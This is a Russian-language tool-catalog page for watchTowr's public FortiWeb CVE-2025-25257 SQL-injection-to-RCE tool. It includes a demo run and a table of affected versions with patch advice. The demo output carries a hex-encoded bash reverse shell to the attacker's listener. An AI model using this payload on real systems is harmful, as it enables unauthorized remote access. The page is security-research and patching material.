Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
watchTowr-vs-FortiWeb-CVE-2025-25257 | Kitploit
Инструменты/GitHubGitHub/watchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257

watchTowr-vs-FortiWeb-CVE-2025-25257

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
100241 год назадПроверено Kitploit

watchTowr-vs-FortiWeb-CVE-2025-25257

Генератор артефактов обнаружения для FortiWeb CVE-2025-25257

Технические подробности см. в нашем посте в блоге

https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194

Демонстрация работы

root@kitploit:~
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

Описание

Этот скрипт пытается определить, уязвим ли FortiWeb к CVE-2025-25257

Затронутые версии

Затронуты следующие версии FortiWeb:

Для получения дополнительной информации посетите FortiGuard Labs PSIRT

Следите за watchTowr Labs

За последними результатами исследований в области безопасности следите за командой watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Скачать инструмент
ВерсияЗатронутые версииРешение
FortiWeb 7.6с 7.6.0 по 7.6.3Обновитесь до 7.6.4 или выше
FortiWeb 7.4с 7.4.0 по 7.4.7Обновитесь до 7.4.8 или выше
FortiWeb 7.2с 7.2.0 по 7.2.10Обновитесь до 7.2.11 или выше
FortiWeb 7.0с 7.0.0 по 7.0.10Обновитесь до 7.0.11 или выше